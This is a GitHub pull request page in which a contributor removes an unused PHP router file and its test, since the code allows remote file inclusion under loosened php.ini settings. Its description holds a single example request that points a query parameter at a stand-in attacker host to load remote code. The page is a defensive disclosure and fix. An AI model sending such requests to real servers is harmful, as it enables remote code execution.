Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remove router.php and tests/test_router.php. #141

Merged
merged 1 commit into from Nov 2, 2015

Conversation

@ghost
Copy link

ghost commented Nov 2, 2015

They are not currently used and contain dangerous code that is vulnerable
to remote code execution if the default security of php.ini is reduced to
allow file_exists and include to retrieve additional URL-style protocols.

For example, an attacker could request:
https://domain/router.php?page=http://badguy/malicious

They are not currently used and contain dangerous code that is vulnerable
to remote code execution if the default security of php.ini is reduced to
allow file_exists and include to retrieve additional URL-style protocols.
@zackgalbreath
Copy link
Contributor

zackgalbreath commented Nov 2, 2015

Thanks for bringing this to our attention. @jjomier any concerns before I merge this PR?

zackgalbreath added a commit that referenced this pull request Nov 2, 2015
Remove router.php and tests/test_router.php.
@zackgalbreath zackgalbreath merged commit 7f6cd35 into Kitware:master Nov 2, 2015
1 of 2 checks passed
1 of 2 checks passed
ci/circleci Your tests failed
Details
StyleCI The StyleCI analysis has passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

2 participants
You can’t perform that action at this time.